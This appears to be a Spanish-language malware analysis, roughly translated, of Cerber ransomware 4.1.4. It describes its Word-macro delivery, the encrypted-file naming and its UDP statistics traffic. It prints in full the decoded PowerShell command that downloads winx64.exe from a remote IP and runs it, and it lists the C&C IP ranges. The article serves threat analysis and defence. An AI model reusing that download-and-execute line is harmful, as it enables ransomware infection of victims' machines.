Versión nueva del Cerber 4.1.4 funciona con 3 rangos de IP para UDP
Cerber 4.1.4 Actualmente se distribuye utilizando documentos de Word con macros maliciosas que descargan e instalan el ransomware. Estos documentos de Word se envían como archivos adjuntos de correo electrónico como adjuntos. Otra característica interesante que no se ha visto en las variantes anteriores, es el uso de múltiples rangos de IP que Cerber utilizará para enviar las estadísticas y la información sobre las víctimas infectadas a los servidores de c & c.
Estos nombres de archivo de documentos de Word contienen sólo números y serían nombrados algo parecido a 566474170.doc. Versiones actuales de Word no permitirán que se abran las macros maliciosos de forma predeterminada. Si la macro es abierta sera descargado e instalado, por lo que el documento contendrá un mensaje que intenta engañar al usuario para que haga clic en el Habilitar contenido botón.
Una vez que se hace clic en el botón Habilitar contenido, Word habilita las macros y los documentos AutoOpen() la macro se ejecutará. Estas macros maliciosos será protegida de manera que no se puede saber a simple vista lo que están haciendo.
Después deobfuscating de stas macros, se le dejó con un sistema de PowerShell que se ejecutará una cadena codificada base 64. Cuando se decodifica aún más esta cadena de base 64, nos quedamos con el comando que será ejecutado.
POWERSHELL.EXE -window hidden (New-Object System.Net.WebClient).DownloadFile('http://94.102.58.30/~trevor/winx64.exe',"$env:APPDATA\winx64.exe");Start-Process ("$env:APPDATA\winx64.exe")
Como se puede ver, el comando anterior se descargará un archivo winx64.exe desde un sitio remoto, y lo guarda en %AppData%\winx64.exe y luego se ejecuta. Una vez que se ejecuta comenzará a cifrar los datos de la víctima.
Al igual que las versiones anteriores, los datos cifrados se añadirá una extensión que se basa fuera de valor MachineGuid del ordenador que se encuentra en la clave de registro HKLM\Software\Microsoft\Cryptography. Asimismo, se creará notas de rescate con el nombre Readme.hta.
Estadísticas UDP Utilice rangos IP múltiples
En la versión anterior, Cerber utiliza un rango de direcciones IP para enviar la información estadística. Esta versión utiliza tres diferentes rangos que va a enviar paquetes UDP estadísticas. Estos son 65.55.50.0/27, 192.42.118.0/27, 194.165.16.0/22.
